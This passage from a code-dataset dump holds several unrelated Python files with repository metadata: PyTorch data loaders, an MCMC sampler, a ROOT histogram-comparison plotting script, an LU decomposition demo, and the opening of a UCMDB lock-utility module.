    df.show(10)
    print("Inicia guardado de La tabla: " + BD + "." + TABLA )
    df2=df.withColumn("Area", lit("PLD"))
    # NOTE(review): DataFrame.saveAsTable exists only in old Spark APIs;
    # modern Spark uses df2.write.saveAsTable(...).  Confirm the Spark
    # version this runs on before touching this line.
    df2.saveAsTable(BD + "." + TABLA, mode='overwrite')
    print("La tabla: " + BD + "." + TABLA + " Ha sido generada")
| [
"noreply@github.com"
] | jorgeecr.noreply@github.com |
055ee26a0b40791d1b3fe385cb7e13e159159ca7 | 2ff7e5c99dd447c42d7883996762400a77404c13 | /data_loader/data_loader.py | 75564ed14a080e12f5940ea1be19adc9600daf16 | [] | no_license | jinyangturbo/sumNet | 5e0254b294059e3ae583e5814f0f4b507bdead66 | ae7756ba4ef478f6f914b1f65f9dc27e1a2991fe | refs/heads/master | 2021-07-20T08:31:12.387971 | 2017-10-30T06:58:19 | 2017-10-30T06:58:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,610 | py | import torch
import torchvision.datasets as dset
import torchvision.transforms as transforms
import torchvision
# Seed torch's global RNG so DataLoader shuffling is reproducible across runs.
torch.manual_seed(0)
# load mnist dataset
def load_mnist_dataset(shuffle=True, batch_size = 64, num_workers=1, root_dir='./data/mnist'):
    """Build (train_loader, test_loader) for MNIST stored under root_dir.

    `shuffle` applies to the training split only; the test split is never
    shuffled.  download=False: the dataset must already be on disk.
    """
    normalize = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5,), (1.0,))])
    loaders = []
    for is_train in (True, False):
        split = dset.MNIST(root=root_dir, train=is_train, transform=normalize, download=False)
        loaders.append(torch.utils.data.DataLoader(
            dataset=split,
            batch_size=batch_size,
            shuffle=shuffle if is_train else False,
            num_workers=num_workers))
    train_loader, test_loader = loaders
    print('==>>> total trainning batch number: {}'.format(len(train_loader)))
    print('==>>> total testing batch number: {}'.format(len(test_loader)))
    return train_loader, test_loader
# load fashion-mnist dataset
def load_fashion_mnist_dataset(shuffle=True, batch_size = 64, num_workers=1, root_dir='./data/fashion_mnist'):
    """Build (train_loader, test_loader) for Fashion-MNIST under root_dir.

    Uses the FashionMNIST subclass defined in this module; `shuffle` only
    affects the training split, and download=False requires the data to
    already exist on disk.
    """
    data_transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5,), (1.0,))])
    train_set = FashionMNIST(root=root_dir, train=True, transform=data_transform, download=False)
    test_set = FashionMNIST(root=root_dir, train=False, transform=data_transform, download=False)
    train_loader = torch.utils.data.DataLoader(dataset=train_set, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)
    test_loader = torch.utils.data.DataLoader(dataset=test_set, batch_size=batch_size, shuffle=False, num_workers=num_workers)
    print('==>>> total trainning batch number: {}'.format(len(train_loader)))
    print('==>>> total testing batch number: {}'.format(len(test_loader)))
    return train_loader, test_loader
# load cifar10 dataset
def load_cifar10_dataset(shuffle=True, batch_size = 64, num_workers=1, root_dir='./data/cifar10'):
    """Build (train_loader, test_loader) for CIFAR-10 stored under root_dir.

    Training images get random-crop + horizontal-flip augmentation; the
    test split is only normalized and is served in fixed batches of 100.
    download=False: the dataset must already be on disk.
    """
    cifar_mean = (0.4914, 0.4822, 0.4465)
    cifar_std = (0.2023, 0.1994, 0.2010)
    augment = transforms.Compose([
        transforms.RandomCrop(32, padding=4),
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        transforms.Normalize(cifar_mean, cifar_std),
    ])
    plain = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize(cifar_mean, cifar_std),
    ])
    train_set = torchvision.datasets.CIFAR10(root=root_dir, train=True, download=False, transform=augment)
    train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)
    test_set = torchvision.datasets.CIFAR10(root=root_dir, train=False, download=False, transform=plain)
    test_loader = torch.utils.data.DataLoader(test_set, batch_size=100, shuffle=False, num_workers=num_workers)
    print('==>>> total trainning batch number: {}'.format(len(train_loader)))
    print('==>>> total testing batch number: {}'.format(len(test_loader)))
    return train_loader, test_loader
class FashionMNIST(dset.MNIST):
"""`Fashion MNIST <https://github.com/zalandoresearch/fashion-mnist>`_ Dataset.
"""
urls = [
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-images-idx3-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-labels-idx1-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-images-idx3-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-labels-idx1-ubyte.gz',
] | [
"solopku@hotmail.com"
] | solopku@hotmail.com |
d179a1555ad8e8c73fe5003ff3315b9930a08df5 | f435930662f1e99bbc22a4557c9636842d59b207 | /mcmc.py | 4e8b2529d205026bed9f288e059d9876b7c18a1b | [
"MIT"
] | permissive | simedcn/SysID | d4c3a93aaded0681ed485a97f7848e9c76ba0e56 | 6673b042242a53b78d56d5cc287d6edc73568cfe | refs/heads/master | 2022-01-23T01:19:22.582310 | 2019-08-19T14:13:25 | 2019-08-19T14:13:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,269 | py | import numpy as np
from scipy.stats import multivariate_normal as mvn
from scipy.stats import laplace
class mcmc:
    """Random-walk Metropolis-Hastings sampler.

    Parameters
    ----------
    niter : int
        Number of MCMC iterations.
    data : array_like
        Observed data the model prediction is compared against.
    model : object
        Must expose `dim`, prior hyper-parameters `mu_th`/`cov_th`,
        noise hyper-parameters `mu_eps`/`cov_eps`, and `modelFun(th)`
        returning the prediction for parameter vector `th`.
    isSparse : bool
        If True, use a sparsity-inducing Laplace prior on theta;
        otherwise a multivariate normal prior.
    """

    def __init__(self, niter, data, model, isSparse):
        self.niter = niter
        self.data = data
        self.model = model
        self.th = np.zeros([niter, model.dim])     # proposed samples (QoI)
        self.p = np.zeros(niter)                   # relative posterior probability
        self.th_mc = np.zeros([niter, model.dim])  # accepted Markov chain {theta_t}
        self.isSparse = isSparse

    def posterior(self, th):
        """Return the (unnormalised) posterior probability of `th`.

        Returns 0 when the model prediction contains NaN, i.e. the
        candidate parameters make no physical sense.
        """
        mu_th = self.model.mu_th
        cov_th = self.model.cov_th
        mu_eps = self.model.mu_eps
        cov_eps = self.model.cov_eps
        # compute model prediction corresp. to guess th
        predict = self.model.modelFun(th)
        # BUG FIX: the original `any(predict == np.nan)` was always False,
        # because NaN never compares equal to anything (including itself);
        # np.isnan is the correct test for invalid predictions.
        if np.isnan(predict).any():
            return 0
        # data = predict + eps, where eps is assumed normally distr'd
        epsilon = np.linalg.norm(self.data - predict)
        if self.isSparse:
            # sparsity-inducing Laplace prior, independent per component
            p_th = laplace.pdf(th, loc=mu_th, scale=cov_th).prod()
        else:
            # generic multivariate normal prior
            p_th = mvn.pdf(th, mean=mu_th, cov=cov_th)
        # likelihood of the residual norm (assumed normally distributed)
        p_eps = mvn.pdf(epsilon, mean=mu_eps, cov=cov_eps)
        # posterior ~ likelihood * prior
        return p_eps * p_th

    def propose(self, th_t):
        """Propose the next theta via a Gaussian random walk around th_t."""
        # proposal covariance: shrunken prior covariance
        cov = self.model.cov_th / np.power(1.5, 2)
        return mvn.rvs(th_t, cov)

    def metropolis_hastings(self):
        """Run the Metropolis-Hastings iterations, filling self.th_mc."""
        # initial guess drawn from the prior, and its posterior probability
        self.th[0] = mvn.rvs(self.model.mu_th, self.model.cov_th)
        self.p[0] = self.posterior(self.th[0])
        th_t = self.th[0]  # current theta_t
        p_t = self.p[0]    # current posterior value
        for i in range(1, self.niter):
            if np.mod(i, np.floor(self.niter / 10)) == 1 or (self.niter - i < 10):
                print('Iter', i, 'out of', self.niter)  # progress report
            self.th[i] = self.propose(th_t)       # propose from previous sample
            self.p[i] = self.posterior(self.th[i])
            # acceptance probability, guarding against a zero current posterior
            alpha = min([1, self.p[i] / p_t]) if p_t != 0 else 1 if self.p[i] != 0 else 0
            if np.random.rand() <= alpha:  # accept or reject
                th_t = self.th[i]
                p_t = self.p[i]
            self.th_mc[i] = th_t
if __name__ == "__main__":
    # Smoke-test driver: evaluate the forward model at the first stored guess
    # and report how far the prediction is from the noisy data.
    from mcmc_test_cases import testCase

    case_id = 2
    noise = 0.02
    scenario = testCase(case_id, noise)
    guess = scenario.th[0]
    prediction = scenario.model.modelFun(guess)
    print('Test case:', case_id)
    print('Data:', scenario.data)
    print('Initial guess:', guess)
    print('Result from the guess:', prediction)
    print('Error: |data - result| =', np.linalg.norm(scenario.data - prediction))
"boweiwu@umich.edu"
] | boweiwu@umich.edu |
b8e7bca47b25672de9c3a658279ed59edd3a3dfd | d541f3624379baa43a3f7e4bcfa9c7ea92c38a2f | /NSF_ValidationSuite/compareToReferenceHists.py | fa2fc659869df76d87c7891759491443a63c0e3e | [
"MIT"
] | permissive | ryounsumiko/MAT | c5f032ddb1b6cac0f4d37bb3f7c0d6c3a1e8db42 | 490c2116d9c794b80f2738e8d013785e2d95a6e6 | refs/heads/main | 2023-06-16T19:43:02.137694 | 2021-07-07T21:09:49 | 2021-07-07T21:09:49 | 383,863,078 | 0 | 0 | MIT | 2021-07-07T16:36:23 | 2021-07-07T16:36:22 | null | UTF-8 | Python | false | false | 13,421 | py | ## import common python modules
import ROOT,PlotUtils,os,sys
from argparse import ArgumentParser
## modify $PYTHONPATH to know about custom python modules
PLOTUTILSROOT = os.path.expandvars("$PLOTUTILSROOT")
sys.path.append("{0}/NSF_ValidationSuite/py_classes".format(PLOTUTILSROOT))
## import custom python modules
from plottingClasses import *
from errorMaps import error_bands
## Configure MnvPlotter`
plotter = PlotUtils.MnvPlotter()
# Manually override default error summary groups
plotter.error_summary_group_map.clear()
for group in error_bands:
for error in error_bands[group]:
plotter.error_summary_group_map[group].push_back(error)
## Miscellaneous Plotting prep
plotter.axis_maximum_group = 0.01
##set ROOT to batch mode
ROOT.gROOT.SetBatch()
#Load and implement Phil's plot style header file
ROOT.gROOT.ProcessLine(".L {0}/NSF_ValidationSuite/style/myPlotStyle.h".format(PLOTUTILSROOT))
ROOT.myPlotStyle()
# This helps python and ROOT not fight over deleting something, by stopping ROOT from trying to own the histogram. Thanks, Phil!
# Specifically, w/o this, this script seg faults in the case where I try to instantiate FluxReweighterWithWiggleFit w/ nuE constraint set to False for more than one playlist
ROOT.TH1.AddDirectory(False)
############################################################################################## Preamble above
def produceComparisonPlots(hist_user,hist_reference,histString,lowerBoundX,upperBoundX,horizontalAxisLabel,plotDir):
  """Write comparison .png plots (CV overlay, ratio, difference, error
  summaries and per-error-band overlays/ratios) for a user histogram vs.
  the corresponding reference histogram.

  hist_user, hist_reference -- PlotUtils MnvH1D-style histograms to compare
  histString                -- short tag used in the output file names
  lowerBoundX, upperBoundX  -- x-axis display range
  horizontalAxisLabel       -- x-axis title
  plotDir                   -- directory receiving the .png files
  """
  ## Set vertical axis bounds (used for all ratio plots)
  lowerBoundY = 0.9
  upperBoundY = 1.1
  # For ratio plots: reference line at y == 1
  lineAt1 = ROOT.TLine(lowerBoundX,1,upperBoundX,1)
  lineAt1.SetLineColor(ROOT.kRed+1)
  lineAt1.SetLineWidth(2)
  #############################################################################################################
  ### Plot CV #################################################################################################
  #############################################################################################################
  # Pull out CV (central value with statistical errors only)
  cvHist_user = hist_user.GetCVHistoWithStatError()
  cvHist_reference = hist_reference.GetCVHistoWithStatError()
  # Overlay: user (red) on top of reference (blue)
  with makeEnv_TCanvas('{0}/CV_inclusive_{1}.png'.format(plotDir,histString)):
    cvHist_user.SetMarkerColor(ROOT.kRed)
    cvHist_user.SetLineColor(ROOT.kRed)
    cvHist_user.GetXaxis().SetTitle(horizontalAxisLabel)
    cvHist_reference.SetMarkerColor(ROOT.kBlue)
    cvHist_reference.SetLineColor(ROOT.kBlue)
    cvHist_reference.Draw()
    cvHist_user.Draw("same")
  # Bin-by-bin CV ratio user/reference
  hist_ratioCV = cvHist_user.Clone("ratioCV")
  hist_ratioCV.Divide(hist_ratioCV,cvHist_reference)
  hist_ratioCV.GetYaxis().SetRangeUser(lowerBoundY,upperBoundY)
  hist_ratioCV.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)
  hist_ratioCV.GetXaxis().SetTitle(horizontalAxisLabel)
  hist_ratioCV.GetYaxis().SetTitle("CV Ratio (user/reference)")
  with makeEnv_TCanvas('{0}/CV-Comparison_ratio_inclusive_{1}_user_to_reference.png'.format(plotDir,histString)):
    hist_ratioCV.Draw()
    lineAt1.Draw()
  # Bin-by-bin CV difference user - reference
  hist_differenceCV = cvHist_user.Clone("differenceCV")
  hist_differenceCV.Add(cvHist_reference,-1)
  hist_differenceCV.GetYaxis().SetRangeUser(-5,5)
  #hist_differenceCV.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)
  hist_differenceCV.GetXaxis().SetTitle(horizontalAxisLabel)
  hist_differenceCV.GetYaxis().SetTitle("CV Difference (user - reference)")
  with makeEnv_TCanvas('{0}/CV-Comparison_difference_inclusive_{1}_user_minus_reference.png'.format(plotDir,histString)):
    hist_differenceCV.Draw()
  # Systematic error summaries for each input separately
  with makeEnv_TCanvas('{0}/CV_errorSummary_user.png'.format(plotDir)) as canvas:
    hist_user_local = hist_user.Clone("hist_user_local")
    hist_user_local.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)
    hist_user_local.GetXaxis().SetTitle("{0} [user]".format(horizontalAxisLabel))
    localDrawErrorSummary(plotter,hist_user_local)
  with makeEnv_TCanvas('{0}/CV_errorSummary_reference.png'.format(plotDir)):
    hist_reference_local = hist_reference.Clone("hist_reference_local")
    hist_reference_local.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)
    hist_reference_local.GetXaxis().SetTitle("{0} [reference]".format(horizontalAxisLabel))
    localDrawErrorSummary(plotter,hist_reference_local)
  #############################################################################################################
  ### Loop over vertical error bands ##########################################################################
  #############################################################################################################
  # NOTE(review): the exec() calls below synthesize dynamically named
  # variables (eb_user, eb_reference, eb<i>_user, ...) that are reused
  # after the inner loop -- preserved as-is; a refactor to dicts would
  # need careful validation against the produced plots.
  for errorBand in ['Flux',
                    'GENIE_AGKYxF1pi',
                    'GENIE_AhtBY',
                    'GENIE_BhtBY',
                    'GENIE_CCQEPauliSupViaKF',
                    'GENIE_CV1uBY',
                    'GENIE_CV2uBY',
                    'GENIE_EtaNCEL',
                    'GENIE_FrAbs_N',
                    'GENIE_FrAbs_pi',
                    'GENIE_FrCEx_N',
                    'GENIE_FrCEx_pi',
                    'GENIE_FrElas_N',
                    'GENIE_FrElas_pi',
                    'GENIE_FrInel_N',
                    'GENIE_FrPiProd_N',
                    'GENIE_FrPiProd_pi',
                    'GENIE_MFP_N',
                    'GENIE_MFP_pi',
                    'GENIE_MaCCQEshape',
                    'GENIE_MaNCEL',
                    'GENIE_MaRES',
                    'GENIE_MvRES',
                    'GENIE_NormCCQE',
                    'GENIE_NormDISCC',
                    'GENIE_NormNCRES',
                    'GENIE_RDecBR1gamma',
                    'GENIE_Rvn1pi',
                    'GENIE_Rvn2pi',
                    'GENIE_Rvp1pi',
                    'GENIE_Rvp2pi',
                    'GENIE_Theta_Delta2Npi',
                    'GENIE_VecFFCCQEshape',
                    'MINOS_Reconstruction_Efficiency',
                    'Low_Recoil_2p2h_Tune',
                    'RPA_HighQ2',
                    'RPA_LowQ2',
                    'Muon_Energy_MINERvA',
                    'Muon_Energy_MINOS',
                    'Muon_Energy_Resolution',
                    'BeamAngleX',
                    'BeamAngleY',
                    'Proton_Response',
                    'Pion_Response',
                    'EM_Response',
                    'Other_Response'
                   ]:
    exec("nUniverses = hist_user.GetVertErrorBand(\"{0}\").GetNHists()".format(errorBand))
    #for hist,nameString in [[hist_user,"user"],[hist_reference,"reference"]]:
    for hist,nameString in [[hist_reference,"reference"],[hist_user,"user"]]:
      # Set hist specs
      exec("hist.GetVertErrorBand(\"{0}\").GetXaxis().SetTitle(horizontalAxisLabel)".format(errorBand))
      exec("hist.GetVertErrorBand(\"{0}\").GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)".format(errorBand))
      # Pull out error bands and save to use in this loop as well as outside of this loop
      exec("eb_{0} = hist.GetVertErrorBand(\"{1}\").GetErrorBand(True)".format(nameString,errorBand))
      for i in range(nUniverses):
        exec("eb{0}_{1} = hist.GetVertErrorBand(\"{2}\").GetHist({0})".format(i,nameString,errorBand))
      exec("hist_local = hist.Clone(\"hist_local_{0}\")".format(nameString))
      # All universes of this band overlaid on the CV (green)
      with makeEnv_TCanvas('{0}/errorBand_inclusive_{1}_{2}.png'.format(plotDir,nameString,errorBand)):
        exec("hist_local.GetVertErrorBand(\"{0}\").DrawAll(\"\",True)".format(errorBand))
        exec("cvHist_local = cvHist_{0}.Clone(\"cvHist_local_{0}\")".format(nameString))
        cvHist_local.SetMarkerColor(ROOT.kGreen)
        cvHist_local.SetLineColor(ROOT.kGreen)
        cvHist_local.Draw("same")
      # Fractional size of this error band
      with makeEnv_TCanvas('{0}/errorBand_inclusive_{1}_{2}_fractional.png'.format(plotDir,nameString,errorBand)):
        exec("fracEB = hist_local.GetVertErrorBand(\"{0}\").GetErrorBand(True)".format(errorBand))
        fracEB.Draw()
      # Universes divided by the CV, to show relative spread
      exec("hist_local.DivideSingle(hist_local,cvHist_{0})".format(nameString))
      hist_local.GetXaxis().SetTitle(horizontalAxisLabel)
      hist_local.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)
      hist_local.GetYaxis().SetRangeUser(lowerBoundY,upperBoundY)
      with makeEnv_TCanvas('{0}/errorBand_inclusive_ratio_{1}_{2}.png'.format(plotDir,nameString,errorBand)):
        hist_local_cv = hist_local.GetCVHistoWithStatError()
        hist_local_cv.Draw()
        exec("hist_local.GetVertErrorBand(\"{0}\").DrawAll(\"same\",True)".format(errorBand))
    # user/reference ratio of the error band itself
    hist_ratio = eb_user.Clone("ratio_{0}".format(errorBand))
    hist_ratio.Divide(eb_user,eb_reference)
    hist_ratio.GetYaxis().SetRangeUser(lowerBoundY,upperBoundY)
    with makeEnv_TCanvas('{0}/ratio_inclusive_user_to_reference_{1}.png'.format(plotDir,errorBand)):
      hist_ratio.Draw()
    # Per-universe user/reference ratios
    for i in range(nUniverses):
      exec("hist_ratio_universe{0} = eb{0}_user.Clone(\"ratio_{1}_universe0\")".format(i,errorBand))
      exec("hist_ratio_universe{0}.Divide(eb{0}_user,eb{0}_reference)".format(i))
      exec("hist_ratio_universe{0}.GetYaxis().SetRangeUser(lowerBoundY,upperBoundY)".format(i))
      exec("hist_ratio_universe{0}.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)".format(i))
      with makeEnv_TCanvas('{0}/ratio_inclusive_user_to_reference_{1}_universe{2}.png'.format(plotDir,errorBand,i)):
        exec("hist_ratio_universe{0}.Draw()".format(i))
        lineAt1.Draw()
def main():
  """Entry point: parse CLI options, load user and reference histogram
  files, then produce comparison plots for Emu, Ptmu and recoil."""
  print "I'm inside main!"
  #############################################################################################################
  ### User customizations #####################################################################################
  #############################################################################################################
  # Names of the histograms expected inside the user's input ROOT file
  user_Emu_histogram_name = "h_inclusive_Emu"
  user_Ptmu_histogram_name = "h_inclusive_Pt"
  user_recoil_histogram_name = "h_inclusive_Nu"
  #############################################################################################################
  ### Parse user arguments and set filepaths ##################################################################
  #############################################################################################################
  ## Parse user args
  parser = ArgumentParser(description='Process optional inputs')
  parser.add_argument('--input', dest='inputFilePath', action='store')
  parser.add_argument('--outdir', dest='outDir', action='store')
  parser.add_argument('--compare', dest='compareTo', action='store')
  parser.add_argument('--refHists', dest='userRefHists', action='store',default='')
  OPTS_VEC = parser.parse_args()
  ## Output directory (created if missing)
  plotDir = OPTS_VEC.outDir
  if not os.path.isdir(plotDir):
    print "Making plot directory {0}".format(plotDir)
    os.system( "mkdir %s" % plotDir )
  ## Reference histograms: explicit --refHists wins, else pick by --compare
  if not OPTS_VEC.userRefHists == '': filePath_reference = OPTS_VEC.userRefHists
  else:
    refDir = '/minerva/data/NSF_Validation/referenceHists/'
    if OPTS_VEC.compareTo == 'CCQENu': refFile = 'NSF_MnvGENIEv1_CCQENu_mc_minervame1L_2020-04-17.root'
    elif OPTS_VEC.compareTo == 'NukeCC': refFile = 'NSF_MnvGENIEv1_NukeCC_mc_minervame1L_2020-04-17.root'
    else:
      print "You asked to compare your histograms to reference histograms that don't exist. I'm exiting gracefully."
      sys.exit()
    filePath_reference = "{0}/{1}".format(refDir,refFile)
  ## User input histogram file
  filePath_user = OPTS_VEC.inputFilePath
  #############################################################################################################
  ### Pull histograms out of input files ######################################################################
  #############################################################################################################
  histFile_user = ROOT.TFile(filePath_user)
  histFile_reference = ROOT.TFile(filePath_reference)
  hist_Emu_user = histFile_user.Get(user_Emu_histogram_name)
  hist_Ptmu_user = histFile_user.Get(user_Ptmu_histogram_name)
  hist_recoil_user = histFile_user.Get(user_recoil_histogram_name)
  # Coarser binning for the recoil distribution (both inputs treated alike)
  hist_recoil_user.Rebin(10)
  hist_Emu_reference = histFile_reference.Get("h_inclusive_Emu")
  hist_Ptmu_reference = histFile_reference.Get("h_inclusive_Pt")
  hist_recoil_reference = histFile_reference.Get("h_inclusive_Nu")
  hist_recoil_reference.Rebin(10)
  # One pass per observable: [tag, x-range low, x-range high, axis label]
  for [histString,lowerBoundX,upperBoundX,horizontalAxisLabel] in [['Emu',0,120,"Reconstructed E_{#mu} (GeV)"],
                                                                   ['Ptmu',0,2.5,"Reconstructed P^{T}_{#mu} (GeV)"],
                                                                   ['recoil',0,5000,"Recoil Energy (MeV)"]
                                                                  ]:
    # exec picks out the matching pair of histograms defined above
    exec("hist_user = hist_{0}_user".format(histString))
    exec("hist_reference = hist_{0}_reference".format(histString))
    ## Output subdirectory per observable
    plotSubdir = "{0}/{1}".format(plotDir,histString)
    if not os.path.isdir(plotSubdir):
      print "Making plot directory {0}".format(plotSubdir)
      os.system( "mkdir %s" % plotSubdir )
    produceComparisonPlots(hist_user,hist_reference,histString,lowerBoundX,upperBoundX,horizontalAxisLabel,plotSubdir)
if __name__ == "__main__":
  main()
| [
"andrew@djoinc.com"
] | andrew@djoinc.com |
10ba8b7670ca96c7d6a83e9a4cbb5484f4e95a53 | 446bd1170475e640e4a50476cd80514b0693ee61 | /demo/demo1/demo1/picture/jishe/demo2/Demo3/Demo3/spiders/main.py | 04dfd6ea4f4f2efd572b417bf2be0aa4f5725558 | [] | no_license | HarperHao/python | f040e1e76a243a3dba2b342029a74a45232c1c8d | 4bd807605c0acca57b8eea6444b63d36d758cca9 | refs/heads/master | 2021-07-20T04:40:37.515221 | 2020-10-02T08:58:37 | 2020-10-02T08:58:37 | 219,732,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,665 | py | # from scrapy.cmdline import execute
#
# execute("scrapy crawl zuowumianji".split())
import numpy as np
# LU分解
def LU_Decompose(matrix):
    """Doolittle LU decomposition (no pivoting) of a square matrix.

    Returns (L, U) with L unit lower triangular and U upper triangular such
    that L @ U == matrix. For non-square input, prints an error and returns
    None (preserving the original behaviour).

    Fixes the original implementation, which (a) took U = np.triu(matrix),
    i.e. the raw upper triangle of A rather than the actual LU factor, and
    (b) summed over range(0, k-1) instead of range(k) when building L, so
    the returned factors did not satisfy L @ U == matrix.

    Note: no pivoting is performed, so a zero pivot U[k][k] raises a
    division error, as in the original.
    """
    rows, columns = np.shape(matrix)
    if rows != columns:
        print("所输入的矩阵必须是方阵!")
        return
    A = np.asarray(matrix, dtype=float)
    L = np.eye(rows)
    U = np.zeros((rows, columns))
    for k in range(columns):
        # Row k of U: U[k][j] = A[k][j] - sum_{s<k} L[k][s] * U[s][j]
        for j in range(k, columns):
            U[k][j] = A[k][j] - sum(L[k][s] * U[s][j] for s in range(k))
        # Column k of L (below the unit diagonal):
        # L[i][k] = (A[i][k] - sum_{s<k} L[i][s] * U[s][k]) / U[k][k]
        for i in range(k + 1, rows):
            L[i][k] = (A[i][k] - sum(L[i][s] * U[s][k] for s in range(k))) / U[k][k]
    return L, U
# 解LY=b
def solve_equation1(L, b):
    """Forward substitution: solve L y = b for lower-triangular L.

    Args:
        L: lower-triangular coefficient matrix.
        b: column vector of shape (n, 1).

    Returns:
        y as a plain Python list.

    Generalizes the original (which assumed a unit diagonal and never
    divided) by dividing by L[i][i]; for unit-diagonal L the results are
    identical.
    """
    n = np.shape(b)[0]
    y = []
    for i in range(n):
        # y[i] = (b[i] - sum_{j<i} L[i][j] * y[j]) / L[i][i]
        partial = sum(L[i][j] * y[j] for j in range(i))
        y.append((b[i][0] - partial) / L[i][i])
    return y
# 解UX=Y
def solve_equation2(U, Y):
    """Back substitution: solve U X = Y for upper-triangular U.

    Args:
        U: upper-triangular coefficient matrix.
        Y: flat sequence of length n (as produced by solve_equation1).

    Returns:
        X as a plain Python list.

    Completes the original truncated implementation, which only touched the
    last unknown, had its zero-pivot guard inverted (`if U[n-1] == 0` took
    the division branch), compared a whole row to 0 (ambiguous for numpy
    arrays), and returned nothing.
    """
    n = np.shape(Y)[0]
    X = [0.0] * n
    # Walk from the last row upward: X[i] = (Y[i] - sum_{j>i} U[i][j] X[j]) / U[i][i]
    for i in range(n - 1, -1, -1):
        partial = sum(U[i][j] * X[j] for j in range(i + 1, n))
        X[i] = (Y[i] - partial) / U[i][i]
    return X
# Demo: factor a 3x3 system; the solve helpers above are left commented out.
matrix = np.array([[2, -1, 1],
                   [4, 1, -1],
                   [1, 1, 1]])
rows, columns = np.shape(matrix)
L, U = LU_Decompose(matrix)
# b = np.eye(rows)
# Right-hand side for L y = b (column vector)
b = np.array([1, 5, 0]).reshape(3, 1)
# y = solve_equation1(L, b)
print(L, U)
| [
"m19834406344@163.com"
] | m19834406344@163.com |
0ca0daaa2b979abd328191a6168d13b742b6e4f8 | 3637fe729395dac153f7abc3024dcc69e17f4e81 | /reference/ucmdb/discovery/LockUtils.py | d37de20386d6bcca8280da0db434a05d758387e4 | [] | no_license | madmonkyang/cda-record | daced6846c2456f20dddce7f9720602d1583a02a | c431e809e8d0f82e1bca7e3429dd0245560b5680 | refs/heads/master | 2023-06-15T08:16:46.230569 | 2021-07-15T16:27:36 | 2021-07-15T16:27:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,251 | py | #coding=utf-8
import sys
import re
from threading import Event
import time
import logger
import errormessages
import inventoryerrorcodes
import errorobject
from java.lang import System
from java.util import Random
from java.util import HashMap
from com.hp.ucmdb.discovery.library.common import CollectorsParameters
# Names of the scanner-node options used to coordinate exclusive access
ScannerNodeLock = 'SCANNER_EXCLUSIVE_LOCK'
ScannerNodeSetLock = 'SCANNER_SET_LOCK'
ScannerNodeUnSetLock = 'SCANNER_UNSET_LOCK'
# Sentinel returned when the node is already locked by a call-home job
ScannerNodeLockedByCallHome = -1
# Job types recorded inside a lock value
INVENTORY_JOB_TYPE = 0
CALLHOME_JOB_TYPE = 1
# A lock older than this is considered stale and may be removed
LOCK_AGE_PERIOD_HOURS = 24
LOCK_AGE_PERIOD_MINUTES = LOCK_AGE_PERIOD_HOURS * 60
LOCK_AGE_PERIOD_SECONDS = LOCK_AGE_PERIOD_MINUTES * 60
LOCK_AGE_PERIOD_MILLISECONDS = LOCK_AGE_PERIOD_SECONDS * 1000
#LOCK_PATTERN = probe___job___timeinmillis
OLD_LOCK_PATTERN_DELIMITER = '___'
# Current delimiter is the literal text \\\___\\\ (escaped here)
LOCK_PATTERN_DELIMITER = '\\\\\\___\\\\\\'
LOCK_PATTERN = '%s' + LOCK_PATTERN_DELIMITER + '%s' + LOCK_PATTERN_DELIMITER + '%s' + LOCK_PATTERN_DELIMITER + '%s' + LOCK_PATTERN_DELIMITER + '%s'
LOCK_RELEASE_RETRIES = 10
class Lock:
    """Value object describing a scanner-node lock: owning probe/job plus
    creation and expiration timestamps (epoch milliseconds)."""

    def __init__(self, probe, jobType, jobId, lockTime, lockExpiration):
        self.probe = str(probe)
        self.jobType = jobType
        self.jobId = str(jobId)
        self.lockTime = lockTime
        self.lockExpiration = lockExpiration

    def isSameLock(self, remoteLock):
        """True when ``remoteLock`` was taken by this same probe/job pair."""
        logger.debug('Comparing locks.')
        logger.debug('This lock:', self.getLockInfo())
        logger.debug('Compared lock:', remoteLock.getLockInfo())
        sameProbe = self.probe == remoteLock.probe
        sameJob = self.jobId == remoteLock.jobId
        sameType = self.jobType == remoteLock.jobType
        return sameProbe and sameJob and sameType

    def isLockExpired(self, compareTime=None):
        """True when this lock's expiration lies before ``compareTime``
        (defaults to the current system time)."""
        now = System.currentTimeMillis() if compareTime is None else compareTime
        logger.debug('Checking lock expiration. Lock expiration time:', str(self.lockExpiration), ', compare time:', str(now))
        return self.lockExpiration < now

    def getLockInfo(self):
        """Serialize this lock into the on-node option string."""
        fields = (str(self.probe), str(self.jobType), str(self.jobId), str(self.lockTime), str(self.lockExpiration))
        return LOCK_PATTERN % fields

    def printLockInfo(self):
        """Human-readable rendering used in debug logging."""
        return ('probe ' + self.probe + ', jobType ' + str(self.jobType)
                + ', jobId' + self.jobId + ', lock time ' + str(self.lockTime)
                + ', lock expiration ' + str(self.lockExpiration))
def extractLock(lockInfoStr):
    """Parse an on-node lock option string into a Lock object.

    Tries the current delimiter first, then the pre-10.01 one; a value that
    matches neither yields an already-expired placeholder lock.
    """
    logger.debug('Extracting lock from ', str(lockInfoStr))
    parts = lockInfoStr.split(LOCK_PATTERN_DELIMITER)
    if len(parts) < 5:
        parts = lockInfoStr.split(OLD_LOCK_PATTERN_DELIMITER)
        if len(parts) < 5:
            logger.debug('Invalid lock value, setting lock to be expired')
            return Lock('EXPIRED_LOCK', INVENTORY_JOB_TYPE, 'EXPIRED_LOCK', long(0), long(0))
        logger.debug('Found old-fasion lock <pre 10.01 version>')
